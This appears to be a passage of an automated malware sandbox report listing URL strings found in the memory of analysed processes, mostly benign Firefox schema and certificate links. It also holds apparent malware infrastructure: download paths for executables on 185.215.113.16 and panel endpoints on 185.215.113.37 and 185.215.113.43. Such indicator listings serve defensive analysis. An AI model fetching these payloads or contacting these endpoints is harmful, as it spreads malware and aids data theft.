Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 13:48:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eX7gCV1K5Dls9MLA9vMjPW0W3%2BKmmI10%2Fqjs%2FAf4Zv17%2B%2ByekZEJGID%2BW4PN%2FdB6zZrjuraK2sIqLptBz4jkkduTdslSO6hpCODsvRTCJxWrDBwqsAw4JdEL%2FqcEozLsQREevQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d722ecf4bac6c4c-DFW
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exec613
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exepD
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe=b
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exevbB
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/$K0u4
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Data
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/G
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Jp
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/M32
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)5Eu
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6-535557bcc5fa00
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/t
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37n&
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37r
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/15.113.43/ows
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/6165
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.000000000167B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpK
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded6
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded?
Source: skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpr
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/fac00b58987e8fff7a7df309c5441f056fc49#5450#
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ta
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.3196543245.000001379E0DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215144753.000001379FB48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3196543245.000001379E0BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0CB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215983830.000001379FDC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E2DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000002.3240318696.00000137A1B49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3230908573.00000137A054E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E8D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E2DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F3F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlbrowserWouldUpgradeInsecureRequests_startDetection/url
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3033463599.00000137A91ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#Unique
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262908654.00000137A8F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3040371924.00000137A8F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGatePermission
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCapextension/webcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appIdwebcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appNamehttp://mozilla.org/#/properties/featureIdswebcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabledExtension:RegisterContentScriptsComple
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabledhttp://mozilla.org/#/properties/merinoClient
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/userFacingNamewebcom
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/itemshttp://mozilla.org/#/properties/javascriptVali
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/itemsnuo-extensions-migration-in-embedded-import-wi
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/counthttp://mozilla.org/#/properties/userFac
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/starthttps://www.mozilla.org/about/legal/ter
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/totalMicrosurvey
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImportresource:///modules/UrlbarUtils.sys.mjs
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
